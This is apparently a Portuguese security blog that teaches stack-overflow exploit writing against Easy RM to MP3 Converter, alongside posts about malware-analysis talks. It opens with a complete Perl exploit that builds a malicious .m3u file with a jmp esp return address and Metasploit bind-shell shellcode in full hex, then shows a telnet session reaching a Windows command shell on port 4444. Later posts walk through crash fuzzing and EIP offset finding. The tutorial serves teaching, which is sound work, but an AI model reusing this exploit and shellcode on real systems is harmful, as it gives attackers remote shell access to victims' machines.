my $file= "exploitrmtomp3.m3u";
my $junk= "A" x 26072;
my $eip = pack('V',0x01b1f23a);
#jmp esp from MSRMCcodec02.dll
my $shellcode = "\x90" x 25;
# windows/shell_bind_tcp - 730 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=4444, RHOST=
$shellcode=$shellcode."\x56\x54\x58\x36\x33\x30\x57\x54\x58\x36\x33\x38\x56\x58" . 
"\x48\x34\x39\x48\x48\x48\x50\x56\x58\x35\x41\x41\x51\x51" . 
"\x50\x56\x58\x35\x59\x59\x59\x59\x50\x35\x59\x59\x59\x44" . 
"\x35\x4b\x4b\x59\x41\x50\x54\x54\x58\x36\x33\x38\x54\x44" . 
"\x44\x4e\x56\x44\x44\x58\x34\x5a\x34\x41\x36\x33\x38\x36" . 
"\x31\x38\x31\x36\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" . 
"\x49\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" . 
"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54" . 
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50" . 
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4d\x59\x43\x30" . 
"\x43\x30\x45\x50\x43\x50\x4d\x59\x4d\x35\x56\x51\x49\x42" . 
"\x43\x54\x4c\x4b\x56\x32\x56\x50\x4c\x4b\x56\x32\x54\x4c" . 
"\x4c\x4b\x50\x52\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f" . 
"\x4f\x47\x50\x4a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30" . 
"\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43\x32\x56\x4c\x47\x50" . 
"\x49\x51\x58\x4f\x54\x4d\x43\x31\x58\x47\x5a\x42\x5a\x50" . 
"\x56\x32\x56\x37\x4c\x4b\x50\x52\x54\x50\x4c\x4b\x47\x32" . 
"\x47\x4c\x43\x31\x58\x50\x4c\x4b\x47\x30\x54\x38\x4b\x35" . 
"\x4f\x30\x52\x54\x50\x4a\x43\x31\x58\x50\x50\x50\x4c\x4b" . 
"\x47\x38\x54\x58\x4c\x4b\x56\x38\x51\x30\x45\x51\x4e\x33" . 
"\x4b\x53\x47\x4c\x50\x49\x4c\x4b\x56\x54\x4c\x4b\x43\x31" . 
"\x58\x56\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x4f\x31" . 
"\x58\x4f\x54\x4d\x45\x51\x58\x47\x47\x48\x4b\x50\x52\x55" . 
"\x4b\x44\x43\x33\x43\x4d\x5a\x58\x47\x4b\x43\x4d\x51\x34" . 
"\x43\x45\x4d\x32\x51\x48\x4c\x4b\x51\x48\x56\x44\x43\x31" . 
"\x58\x53\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x51\x48" . 
"\x45\x4c\x43\x31\x49\x43\x4c\x4b\x45\x54\x4c\x4b\x45\x51" . 
"\x4e\x30\x4c\x49\x47\x34\x47\x54\x51\x34\x51\x4b\x51\x4b" . 
"\x45\x31\x51\x49\x51\x4a\x56\x31\x4b\x4f\x4b\x50\x50\x58" . 
"\x51\x4f\x50\x5a\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d" . 
"\x43\x58\x50\x33\x56\x52\x45\x50\x43\x30\x45\x38\x43\x47" . 
"\x43\x43\x47\x42\x51\x4f\x50\x54\x43\x58\x50\x4c\x52\x57" . 
"\x51\x36\x43\x37\x4b\x4f\x58\x55\x58\x38\x4c\x50\x45\x51" . 
"\x45\x50\x43\x30\x47\x59\x49\x54\x56\x34\x56\x30\x43\x58" . 
"\x56\x49\x4d\x50\x52\x4b\x45\x50\x4b\x4f\x4e\x35\x50\x50" . 
"\x56\x30\x56\x30\x56\x30\x51\x50\x50\x50\x47\x30\x50\x50" . 
"\x43\x58\x5a\x4a\x54\x4f\x49\x4f\x4b\x50\x4b\x4f\x58\x55" . 
"\x4c\x57\x56\x51\x49\x4b\x51\x43\x52\x48\x54\x42\x45\x50" . 
"\x54\x51\x51\x4c\x4c\x49\x4d\x36\x43\x5a\x52\x30\x50\x56" . 
"\x56\x37\x52\x48\x58\x42\x49\x4b\x56\x57\x43\x57\x4b\x4f" . 
"\x4e\x35\x56\x33\x51\x47\x45\x38\x4f\x47\x5a\x49\x50\x38" . 
"\x4b\x4f\x4b\x4f\x49\x45\x50\x53\x56\x33\x56\x37\x43\x58" . 
"\x54\x34\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x56\x37" . 
"\x4c\x57\x43\x58\x43\x45\x52\x4e\x50\x4d\x43\x51\x4b\x4f" . 
"\x49\x45\x52\x4a\x45\x50\x52\x4a\x43\x34\x51\x46\x56\x37" . 
"\x52\x48\x45\x52\x49\x49\x58\x48\x51\x4f\x4b\x4f\x4e\x35" . 
"\x4c\x4b\x50\x36\x43\x5a\x47\x30\x43\x58\x43\x30\x54\x50" . 
"\x45\x50\x45\x50\x50\x56\x43\x5a\x45\x50\x43\x58\x56\x38" . 
"\x49\x34\x51\x43\x4b\x55\x4b\x4f\x58\x55\x4c\x53\x50\x53" . 
"\x43\x5a\x45\x50\x56\x36\x50\x53\x51\x47\x45\x38\x43\x32" . 
"\x58\x59\x4f\x38\x51\x4f\x4b\x4f\x4e\x35\x43\x31\x49\x53" . 
"\x47\x59\x58\x46\x4b\x35\x4c\x36\x54\x35\x5a\x4c\x49\x53" . 
"\x41\x41";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Crie o arquivo m3u, abra-o com a aplicação. Faça o telnet na porta 4444:

root@bt:/# telnet 192.168.0.197 4444
Trying 192.168.0.197...
Connected to 192.168.0.197.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

E:\Arquivos de programa\Easy RM to MP3 Converter>

Pronto !

Agora construa seus próprios exploits.

Vídeo da palestra Análise de Malwares com Software Livre

2011-06-01T23:31:00.003-03:00

Caros,

No dia 14/05/2011 apresentei a palestra Análise de Malwares com Software Livre, no GTS (Grupo de Trabalho de Segurança de Redes) e nos posts anteriores aqui no blog já divulguei os slides e os vídeos apresentados durante a palestra.

Mas hoje recebi o aviso de que a filmagem da palestra já estava disponível para download.

Portanto, segue o link para quem tiver interesse, e espero que gostem. O vídeo tem em torno de 1h de duração e 500mb de tamanho.

ftp://ftp.registro.br/pub/gter/gter31/videos/mp4/gts-07-Analise_de_Malware.mp4

Abraço,
Luiz

Análise de memória com Volatility (vídeo)

2011-05-28T14:00:00.002-03:00

Como utilizar o Volatility para analisar um dump de memória física e inclusive extrair arquivos maliciosos vinculados à processos em execução. Utilizado em forense computacional e análise de malware.

Os dois vídeos abaixo são um só, dividido em duas parte. Os mesmo foram apresentados nas palestras "Análise de Malwares com Software Livre" no 17º GTS, em SP, e "Análise Forense Computacional com Software Livre" no 8º CNASI, no DF.

Volatility pt.1

Volatility pt.2

Espero que gostem :-)

Análise de malware com Pyew

2011-05-28T10:55:00.002-03:00

Vídeo apresentado na palestra realizado no 17º GTS, com o título de "Análisede Malwares com Software Livre".

Para baixar o código fonte do pywe, clique aqui.

O arquivo analisado com o pyew nesse vídeo, é um .pdf com código javascript malicioso dentro do mesmo, que foi extraído da memória física de uma máquina comprometida utilizando o framework Volatility (em breve postarei o vídeo dessa parte da demonstração).

Espero que gostem, apesa de ser um procedimento simples :-)

Slides da palestra Análise de Malware com Software Livre

2011-05-26T17:01:00.001-03:00

Análise de malware com software livre 17 gts - 2011

View more presentations from luizvieira.

Escrevendo um exploit para Stack Overflow - parte 2

2011-05-16T18:57:00.013-03:00

O debugger

Para ver o estado da pilha (e valor dos registradores tal como o ponteiro de instrução, ponteiro da pilha, e etc), precisamos vincular um debugger à aplicação, assim podemos ver o que acontece no momento em que a aplicação é executada (e especialmente quando termina).

Há muitos debugger disponíveis para tal propósito. Os dois debugger que uso mais frequentemente são OllyDBG e Immunity’s Debugger .

Vamos utilizar o Immunity para efeito prático.

Abra o Immunity debugger, vá ao menu “Options” - “Just in-time debugging” e clique em “Make Immunity Debugger just in-time debugger”.

E vamos em frente...

Inicie o Easy RM to MP3, e então abra o arquivo crash.m3u novamente. A aplicação vai travar de novo. Se surgir algum popup, clique no botão “debug” e o debugger será iniciado:

A tela acima foi cortada para melhor visualização, mas ao executar esse processo, poderá ver que no canto superior esquerdo, que temos a visualização da CPU, que mostra as instruções em assembly e seus opcodes (a janela estará vazia porque o EIP estará apontando para 4141414141, que é um endereço inválido). No canto superior direito, visível na figura acima, podemos ver os registradores. No canto inferior esquerdo (não visível na figura acima), poderemos ver o dump da memória, nesse caso do endereço 00446000. No canto inferior direito, podemos ver o conteúdo da pilha (o conteúdo da memória no local onde o ESP aponta).

Frente ao que vemos, parece que parte de nosso arquivo m3u foi lido e armazenado no buffer e causo o estouro do mesmo. Fomos capazes de estourar o buffer e escrever no ponteiro de instrução. Sendo assim, podemos controlar o valor do EIP.

Como nosso arquivo contém apenas A's, não sabemos exatamente quão grande nosso buffer precisa ser para escrever exatamente no EIP. Em outras palavras, se quisermos ser específicos na sobreescrição do EIP (e assim podermos preenchê-lo e fazê-lo pular para nosso código malicioso), precisamos saber a posição exata em nosso buffer/payload onde sobrescreveremos o endereço de retorno (que se tornará o EIP quando a função retornar). Esta posição é frequentemente referida como o “offset”.

Determinando o tamanho do buffer para escrever exatamente no EIP

Sabemos que o EIP está localizado em algum lugar entre 20000 e 30000 bytes contados do início do buffer. Poderíamos sobrescrever todo o espaço de memória entre 20000 e 30000 bytes com o endereço que queremos sobrescrever no EIP. Isso até pode funcionar, mas será muito mais interessante se pudermos encontrar a localização exata para sobrescrevermos. Para determinar o offset exato do EIP em nosso buffer, precisamos de um pouco mais de trabalho.

Primeiro, vamos tentar apontar a localização alterando um pouco o nosso script perl:

my $file= "crash25000.m3u";
my $junk= "\x41" x 25000;
my $junk2= "\x42" x 5000; 
open($FILE,">$file"); 
print $FILE $junk.$junk2;
close($FILE); 
print "Arquivo m3u criado com sucesso\n";

Vamos cortar algumas coisas. Vamos criar um arquivo contendo 25000 A's e outro com 5000 B's. Se o EIP contiver 41414141(AAAA), o EIP está entre 20000 e 25000, e se o EIP contiver 42424242 (BBBB), o EIP se encontrará entre 25000 e 30000.

Crie o arquivo e abra o crash25000.m3u no Easy RM to MP3.

Ok, então o EIP contém 42424242 (BBBB), então sabemos que o EIP tem um offset entre 25000 e 30000. O que também significa que podemos ver os B's restantes na memória para onde o ESP aponta (já que o EIP foi sobrescrito antes do final dos 30000 caracteres do buffer).

Dump do ESP:

Isso é uma boa notícia. Conseguimos sobrescrever o EIP com BBBB e também podemos ver nosso buffer no ESP.

Antes de podermos começar a construir do script, precisamos encontrar o local exato em nosso buffer que sobrescreve o EIP.

Para encontrarmos o local exato, usaremos o Metasploit.

Metasploit possui uma boa ferramenta que nos ajuda a calcular o offset. Ele gerará uma string que contém um padrão único. Usando esse padrão (e o valor do EIP após utilizar o padrão em nosso arquivo .m3u malicioso), podemos ver quão grande deve ser o buffer para que escrevamos exatamente dentro do EIP.

Abra o diretório tools no diretório do metasploit3 (estou usando uma versão do MSF3 em Linux). Você deverá encontrar uma ferramenta chamada pattern_create.rb. Crie um conjunto de 5000 caracteres e grave-o em um arquivo.

Edite o script perl e substitua o conteúdo de $junk2 pelos 5000 caracteres.

my $file= "crash25000.m3u";
my $junk= "\x41" x 25000;
my $junk2= "coloque os 5000 caracteres aqui";
open($FILE,">$file"); 
print $FILE $junk.$junk2; 
close($FILE); 
print "Arquivo m3u criado com sucesso\n";

Crie o arquivo .m3u. Abra esse arquivo no Easy RM to MP3, aguarde até que a aplicação morra novamente, e preste atenção ao conteúdo do EIP.

Nesse momento, EIP contém 0x6A42376A (perceba que sobrescrevemos o EIP com 6A 37 42 6A – o valor de EIP como visto na figura, ao contrário – que são as strings = j7Bj).

Vamos utilizar uma segunda ferramenta do metasploit para calcular o tamanho exato do buffer antes de escrever no EIP. Entre com o valor do EIP (baseado no conjunto de caracteres) e o tamanho do buffer:

1072. Que é o tamanho do buffer necessário para sobrescrever o EIP (é bem provável que o seu valor seja diferente do meu). Então podemos criar um arquivo com 25000+1072 A's, e então adicionar 4 B's (42 42 42 42 em hexadecimal), de forma qu o EIP contenha 42 42 42 42. Também sabemos que o ESP aponta para dados em nosso buffer, então adicionaremos alguns C's após sobrescrever o EIP.

Vamos tentar, modificando o script perl para criar um novo arquivo .m3u.

my $file= "eipcrash.m3u";
my $junk= "\x41" x 26072;
my $eip= "BBBB";
my $esp= "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$esp;
close($FILE);
print "Arquivo m3u criado com sucesso\n";

Crie o arquivo eipcrash.m3u, abra-o no Easy RM to MP3, observe o travamento e o conteúdo do EIP e da memória do ESP:

Excelente. EIP contém BBBB, que é exatamente o que queremos. Agora controlamos o EIP. No topo do mesmo, ESP aponta para o nosso buffer (C's).

Obs.: o offset mostrado aqui é resultado da análise em meu sistema, que está rodando em uma máquina virtual, inclusive. Em seu sistema, certamente você terá um endereço de offset diferente. Você precisará adaptar o script perl de acordo com o offset que obteve em seu sistema. O buffer que é vulnerável ao overflow inclui o caminho completo ao arquivo m3u. Assim, se o caminho para o arquivo for maior ou menor que o meu, o offset será diferente.

Nosso buffer parecerá com isso:

Buffer	EBP	EIP	ESP aponta para aqui
A (x 26090)	AAAA	BBBB	CCCCCCCCCCCCCCCCCCCCCCCC
414141414141…41	41414141	42424242
26072 bytes	4 bytes	4 bytes	1000 bytes ?

Encontrando espaço na memória para armazenar o shellcode

Controlamos o EIP. Dessa forma, podemos apontar o EIP para qualquer lugar que contenha nosso código (shellcode). Mas onde é esse lugar, como podemos colocar nosso shellcode nesse local e como podemos fazer com que o EIP desloque-se para essa posição?

Para travarmos a aplicação, escrevemos 26072 A's na memória, escrevemos um novo valor no campo salvo do EIP e escrevemos vários C's.

Quando a aplicação trava, dê uma olhada nos registradores e no dump dos mesmos (esp, eax, ebx, ebo, …). Se for capaz de ver seu buffer (seja A ou C) em um dos registradores, então será capaz de alterar esses caracteres com seu shellcode e pular para esse local. Em nosso exemplo, podemos ver que ESP parece apontar para os nossos C's, então, poderíamos colocar nosso shellcode no lugar desses C's e dizer para o EIP ir para o endereço do ESP.

Independente de podermos ver os C's, não podemos ter certeza de que o primeiro C (no endereço 000FF730, para onde o ESP aponta), é de fato o primeiro C que colocamos em nosso buffer.

Mudaremos o script perl e colocaremos um conjunto de caracteres (coloquei 144 caracteres, mas você pode colocar mais ou menos) ao invés dos C's:

my $file= "test1.m3u";
my $junk= "A" x 26072;
my $eip = "BBBB"; 
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" . 
"9ABCDEFGHIJKAABCDEFGHIJK". 
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file"); 
print $FILE $junk.$eip.$shellcode; 
close($FILE); 
print "Arquivo m3u criado com sucesso\n";

Crie o arquivo, abra-o, deixe a aplicação morrer e veja o dump de memória do ESP:

Podemos ver duas coisas interessantes aqui:

O ESP começa no 5º caracter de nosso conjunto, a não no primeiro caracter.
Após o conjunto de caracteres, vemos os “A's”. Estes A's parecem pertencer à primeira parte do buffer (26072 A's), então podemos colocar nosso shellcode na primeira parte do buffer.

Mas não vamos fazer isso agora. Vamos primeiro adicionar 4 caracteres no início do conjunto de caracteres e fazer o teste novamente. Se tudo correr bem, o ESP deve apontar diretamente para o início de nosso conjunto:

my $file= "test2.m3u";
my $junk= "A" x 26094; 
my $eip = "BBBB";
my $preshellcode = "XXXX";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" . 
"5ABCDEFGHIJK6ABCDEFGHIJK" . 
"7ABCDEFGHIJK8ABCDEFGHIJK" . 
"9ABCDEFGHIJKAABCDEFGHIJK". 
"BABCDEFGHIJKCABCDEFGHIJK"; 
open($FILE,">$file");
print $FILE $junk.$eip.$preshellcode.$shellcode;
close($FILE); 
print "Arquivo m3u criado com sucesso\n";

Deixe a aplicação morrer e olhe o ESP novamente:

Bem melhor!

Agora temos:

controle sobre o EIP
uma área onde podemos escrever nosso código (se fizer mais teste com conjuntos maiores de caracteres, poderá ver que tem mais espaço do que 144 caracteres para escrever seu código)
um registrador que aponta diretamente para nosso código, no endereço 0x000FF730

Agora precisamos:

construir um shellcode
dizer para o EIP pular para o endereço de início do shellcode. Podemos fazer isso sobrescrevendo o EIP com 0x000FF730.

Vamos ver...

Construiremos um pequeno teste: primeiro 26072 A's, então sobrescrever o EIP com 000FF730, então colocar 25 NOP's, então um break e mais NOP's.

Se tudo correr bem, o EIP deve pular para 000FF730, que contém NOP's. O código seguir até o break.

my $file= "teste3.m3u";
my $junk= "A" x 26072; 
my $eip = pack('V',0x000ff730);  
my $shellcode = "\x90" x 25;  
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;  
open($FILE,">$file"); 
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "Arquivo m3u criado com sucesso\n";

A aplicação morrerá, mas esperamos um break ao invés de um “access violation”.

Quando olharmos o EIP, ele aponta para 000FF730, e executa o ESP.

Quando olhamos o dump do ESP, não vemos o que esperávamos.

Então, pular diretamente para um endereço de memória pode não ser uma boa solução.

(000FF730 contém um null byte, que é um finalizador de strings... então os A's que está vendo, estão vindo da primeira parte do buffer... Nós não alcançamos o ponto onde começamos a escrever nossos dados após sobrescrever o EIP... Além disso, utilizar um endereço de memória para pular dentro dele faria o exploit não ser confiável. E com isso, este endereço de memória pode ser diferente em outras versões de S.O., linguagem e etc).

Resumindo: não podemos sobrescrever o EIP apenas com um endereço direto de memória tal como 000FF730. Não é uma boa ideia porque pode conter um byte nulo. Temos que usar outra técnica para atingir o mesmo objetivo: fazer com que a aplicação pule para nosso código. Idealmente, seremos capazes de referenciar um registrador (ou um offset de um registrador), ESP no nosso caso, e encontrar uma função que pulará para tal registrador. Então tentaremos sobrescrever o EIP com o endereço daquela função.

Palestras em Maio/2011

2011-04-26T09:20:00.003-03:00

Caros,

Para mantê-los atualizados, agora em maio apresentarei ao todo 3 palestras e 2 mini-cursos no espaço de uma semana (de 14 à 20/05) na área de Forense Computacional e Segurança da Informação.

Então, segue abaixo a agenda:

14/05 - Palestra "Análise de Malwares com Software Livre", no GTS-17 (17º encontro do Grupo de Trabalho de Segurança de Redes - em São Paulo/Capital)

17/05 - Mini-curso "Forense Computacional com Software Livre", no 8º CNASI DF (CONGRESSO DE AUDITORIA DE TI, SEGURANÇA DA INFORMAÇÃO E GOVERNANÇA - em Brasília/DF)

19/05 - Palestra "Mercado de Segurança da Informação: A Estrada de Tijolos Amarelos", na XXI SEMAC UNESP (21º Semana da Computação da UNESP - São Paulo/São José do Rio Preto)

19/05 - Palestra "Forense Computacional com Software Livre", na XXI SEMAC UNESP (21º Semana da Computação da UNESP - São Paulo/São José do Rio Preto)

20/05 - Mini-Curso "Metasploit Framework: Software Livre para PoC de Vulnerabilidades", na XXI SEMAC UNESP (21º Semana da Computação da UNESP - São Paulo/São José do Rio Preto)

Espero poder encontrar alguns dos senhores nesses eventos :-)

PS: para quem não conseguir mais inscrever-se no GTS-17, gostaria de lembrá-los de que evento será transmitido ao vivo na íntegra, e valerá à pena assisti-lo.

Escrevendo um exploit para Stack Overflow - parte 1

2011-04-12T07:15:00.018-03:00

Bem, esse é um primeiro tutorial onde escreveremos um pequeno exploit para uma aplicação Windows escolhida ao acaso, dentre as inúmeras que são vulneráveis a essa falha.

Em julho de 2009 alguém reportou uma vulnerabilidade no programa “Easy RM to MP3 Conversion Utility” no Windows XP SP2, através do packetstormsecurity.org (http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt). O relatório da vulnerabilidade incluia um exploit para prova de conceito. Pouco tempo depois foi liberado um segundo exploit.

Nós poderíamos, nesse momento, baixar os exploits e testá-los na aplicação para vê-los funcionando, ou... podemos tentar entender o processo de construção do exploit para que possamos construir nosso próprio exploit a partir do zero.

De qualquer forma, a menos que uma pessoa saiba como fazer o disassembling, ler e compreender um shellcode ou exploit, nunca se deve baixar um exploit, especialmente se for um executável previamente compilado, e executá-lo. As consequências podem ser desastrosas!

As dúvidas que surgem em nossa mente sobre esse processo de criação de exploits normalmente são: como os desenvolvedores de exploits escrevem seus códigos? Qual e o processo a ser seguido desde a detecção de um possível problema até a criação de um exploit que funcione? Como podemos usar a informação sobre uma vulnerabilidade para desenvolver nossos próprios exploits?

A vulnerabilidade que utilizei para escrever esse tutorial foi escolhida por ser simples e me permitir demonstrar algumas das técnicas que são utilizadas para escrever um exploit que gere um estouro de pilha, ou stack overflow, como é conhecido por aí...

Então, independente do fato de que a vulnerabilidade mencionada já ter dois exploits desenvolvidos (funcionando ou não), ainda poderemos utilizar essa falha no “Easy RM to MP3” como um exemplo prático e seguir um passo a passo para criar um exploit funcional, sem copiar nada dos exploits originais. Faremos desde o início e ainda faremos funcionar em um Windows XP com SP3.

Antes de continuarmos, gostaria de dizer que esse artigo é puramente educacional e não tenho a intenção de que alguém utilize essas informações para hackear computadores ou realizar qualquer tipo de ação ilegal. Portanto, não me responsabilizo pelos atos de outras pessoas que, aproveitando-se de informações contidas nesse artigo, realizem atos ilegais.

De início, é importante que saibam, que a informação contida sobre a vulnerabilidade no relatório liberado em 2009, é a base para nosso trabalho. Nesse caso, o relatório diz que a vulnerabilidade é a seguinte:

“Easy RM to MP3 Converter version 2.7.3.700 universal buffer overflow exploit that creates a malicious .m3u file.”

Em outras palavras, podemos criar um arquivo .m3u malicioso, carregá-lo no aplicativo e ativar o exploit. Esse tipo de relatório não é muito específico na maioria das vezes, mas pelo menos podemos ter uma ideia de como simular um travamento ou fazer com que a aplicação comporte-se de maneira diferente.

Do contrário, o pesquisador de vulnerabilidades também pode liberar o que encontrou para o fabricante, permitindo que ele faça a correção, ou simplesmente guardar o que descobriu para si mesmo.

Verificando o Bug

Antes de tudo, vamos verificar que a aplicação que vamos utilizar realmente trava quando abre um arquivo m3u mal formado. (ou encontre uma aplicação que trave quando você insere algum tipo de dado nela)

Pegue uma cópia da versão vulnerável do Easy RM to MP3 e instale-a em um computador rodando Windows XP. O relatório da vulnerabilidade diz que o exploit funciona em um XP SP2 (Inglês), mas eu utilizarei XP SP3 (Português).

É possível baixar uma cópia da versão vulnerável aqui, no meu HD virtual:

http://www.4shared.com/file/o1vQ7J12/EasyRMtoMP3Converter.html

Vamos utilizar o seguinte script perl para criar o arquivo m3u, que nos ajudará a descobrir mais informações sobre a vulnerabilidade (se criar o script no windows, retire a primeira linha abaixo):

my $file= "crash.m3u";
my $junk= "\x41" x 10000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "Arquivo m3u criado com sucesso\n";

Execute o script perl para criar o arquivo m3u. Seu conteúdo será 10000 letras A (\x41 é o hexadecimal de A). Agora abra o arquivo com o Easy RM to MP3...

A aplicação exibe um erro, mas o erro parece q está sendo tratado corretamente e a aplicação não trava. Modifique o script para criar um arquivo m3u com 20000 A's e tente de novo. Mesmo comportamento (a exception é tratada corretamente, então podemos não ter escrito algo útil). Mas vamos tentar de novo. Mude o script para escrever 30000 A's, crie o arquivo m3u e abra-o com a aplicação.

Booommmm!!!! A aplicação morreu :-)

Bem, descobrimos que a aplicação trava se inserimos um arquivo que contenha entre 20000 e 30000 A's. Mas o que podemos fazer com isso?

Verifique o bug e veja se pode ser algo interessante

Obviamente nem todo travamento de uma aplicação. Em muitos casos, um travamento não nos levará à possível exploração... Mas algumas vezes sim. Com “exploração”, quero dizer que você pode fazer com que a aplicação execute algo diferente através do controle do seu fluxo (e redirecione-o para algum outro local). Isso pode ser feito através do controle do Instruction Pointer , que é um registrador da CPU que contem um ponteiro para onde a próxima instrução que precisa ser executada, está localizada.

Vamos supor que uma determinada aplicação chama uma função com um parâmetro. Antes de ir para a função, ele salva sua localização no instruction pointer (assim saberá para onde retornar quando a função for completada). Se podemos modificar o valor desse ponteiro, e apontá-lo para um local na memória que contenha o código desenvolvido por nós, então podemos mudar o fluxo da aplicação e fazê-la executar algo diferente (diverso do seu retorno original ao local inicial). O código que faremos a aplicação executar após controlar seu fluxo, é normalmente referido como “shellcode”.

Dessa forma, se conseguirmos fazer com que a aplicação execute nosso shellcode, podemos fazer com que ela chame um exploit! Na maioria dos casos, este ponteiro é conhecido pelo termo EIP. Este registrador possui 4 bytes de tamanho. Portanto, se pudermos modificar esse 4 bytes, controlaremos a aplicação (owned...rs).

Antes de continuarmos, um pouco de teoria

Há alguns termos que precisamos que entender. Toda aplicação Windows utiliza partes da memória. A memória de processos contém 3 grandes componente:

code segment (instruções que o processador executa. O EIP armazena o local da próxima instrução)
data segment (variáveis, buffers dinâmicos)
stack segment (utilizado para passar dados/argumentos para funções, e é utilizado como espaço para variáveis. A pilha (stack) começa (a parte inferior da pilha) do final da memória virtual, e vai até o início da mesma (para os endereços menores). Um PUSH adiciona algo ao topo da pilha, POP remove um ítem (4 bytes) da pilha e coloca no registrador.

Se queremos acessar a pilha diretamente, podemos utilizar o ESP (Stack Pointer), que aponta o topo (isso quer dizer o endereço mais baixo da memória) da pilha.

Depois de um PUSH, o ESP apontará para o endereço mais baixo da memória (o endereço é decrementado com o tamanho dos dados que são colocados na pilha, que possuem o tamanho de 4 bytes no caso de endereços/ponteiros). O decremento normalmente ocorre antes do ítem ser colocado na pilha (dependendo da implementação... se o ESP já aponta para o próximo local livre na pilha, o decremento ocorre após a colocação dos dados na pilha).
Após um POP, o ESP aponta para um endereço mais alto (o endereço é incrementado por 4 byes no caso de endereços/ponteiros) O incremento ocorre após um ítem ser removido da pilha.

Quando uma função/subrotina é iniciada, um frame é criado na pilha. Este frame mantém os parâmetros dos procedimentos paralelos e é utilizado para passar argumentos à subrotina. A localização atual da pilha, pode ser acessada através do stack pointer (ESP), a base atual da função estará contida no base pointer (EBP) (ou frame pointer).

Os registradores da CPU para operações em geral (Intel, x86) são:

EAX : accumulator : utilizado na realização de cálculos e armazenar valores retornados por chamadas de funções. Operações básicas como soma, subtração, utilizam esse registrador para propósito geral.
EBX : base (não tem nenhuma relação com o base pointer). Não tem nenhum propósito específico e pode ser utilizado par armazenar dados.
ECX : counter : usado para iterações. ECX realiza sua contagem de forma decrescente.
EDX : data : este é uma extensão do registrador EAX. Permite cálculos mais complexos (multiplicação, divisão) permitindo dados extras serem armazenados para facilitar tais cálculos.
ESP : stack pointer
EBP : base pointer
ESI : source index : armazena a localização da entrada de dados.
EDI : destination index : aponta para a localização de onde o resultado de operações co dados estão armazenados.
EIP : instruction pointer

Memória de Processo

Quando uma aplicação é iniciada em ambiente Win32, um processo é criado e memória virtual é alocada. Em um processo de 32 bits, o range de endereços é de 0x00000000 à 0xFFFFFFFF, onde de 0x00000000 à 0x7FFFFFFF é alocado para “user-land”, e de 0x800000000 à 0xFFFFFFFF é alocado para “kernel-land”. Windows utiliza o flat memory model, que significa que a CPU pode diretaente/sequencialmente/linearmente endereçar todos os locais da memória disponível, sem precisar utilizar o esquema de segmentação/paginação.

A memória de kernel land é acessível apenas pelo sistema operacional.

Quando um processo é criado, um PEB (Process Execution Block) e TEB (Thread Environment Block) são criados.

O PEB contém todos os parâmetros do tipo user land que estão associados com o processo corrente:

localização do principal executável
ponteiro para o carregador de dados (pode ser utilizado para listar todas as dll's/módulos que estão/podem ser carregados no processo)
ponteiro para informação sobre o heap

O TEB descreve o estado da thread, e inclui:

localização do PEB na memória
localização da pilha para a thread a qual pertence
ponteiro para a primeira entrada na SEH chain (veremos o que isso quer dizer em um próximo tutorial)

Cada thread dentro do processo tem um TEB.

O mapa da memória de processos Win32 se parece com o seguinte:

O segmento de texto de uma imagem/dll de um programa é apenas para leitura, já que contém apenas o código da aplicação. Isso previne que alguém modifique o código da aplicação. Este segmento da memória tem um tamanho fixo. O segmento de dados é utilizado para armazenar variáveis estáticas e globais do programa. O segmento de dados é utilizado para variáveis, strings e constantes inicializadas.

O segmento de dados é alterável e possui tamanho fixo. O segmento da heap é utilizado para o restante das variáveis do programa. Pode crescer mais ou menos como desejado. Toda a memória na heap é gerenciada por algoritmos de alocação (e desalocação). Uma região da memória é reservada para esse algoritmos. A heap crescerá em direção aos endereços mais altos.

Em uma dll, o código, imports (lista de funções utilizadas pela dll, de outra dll ou aplicação), e exports (funções disponíveis para outras dll's da aplicação) são partes do segmento .text.

A pilha

A pilha é uma peça da memória de processo, uma estrutura de dados que trabalha no esquema LIFO (Last in first out – último a entrar, primeiro a sair). Uma pilha é alocada pelo só, para cada thread (quando a thread é criada). Quando a thread é finalizada, a pilha também é liberada. O tamanho da pilha é definido quando ela é criada e não é alterado. Combinado com o LIFO e o fato de que não requer mecanismos/estruturas complexas de gerenciamento para ser controlada, a pilha é bem rápida, mas de tamanho limitado.

LIFO significa que o dado mais novo (resultado de uma instrução PUSH), é o primeiro que será removido da pilha novamente (por uma instrução POP).

Quando uma pilha é criada, o ponteiro da pilha aponta para o topo da pilha (o endereço mais alto na pilha). A medida que a informação é inserida na pilha, este ponteiro decrementa-se (vai para um endereço mais baixo). Então, em essência, a pilha sobe para um endereço mais baixo.

A pilha contém variáveis locais, chamadas de função e outras informações que não precisam ser armazenadas por um longo período de tempo. A medida que mais dados são adicionado à pilha, o ponteiro da pilha é decrementado e aponta para um endereço de valor menor.

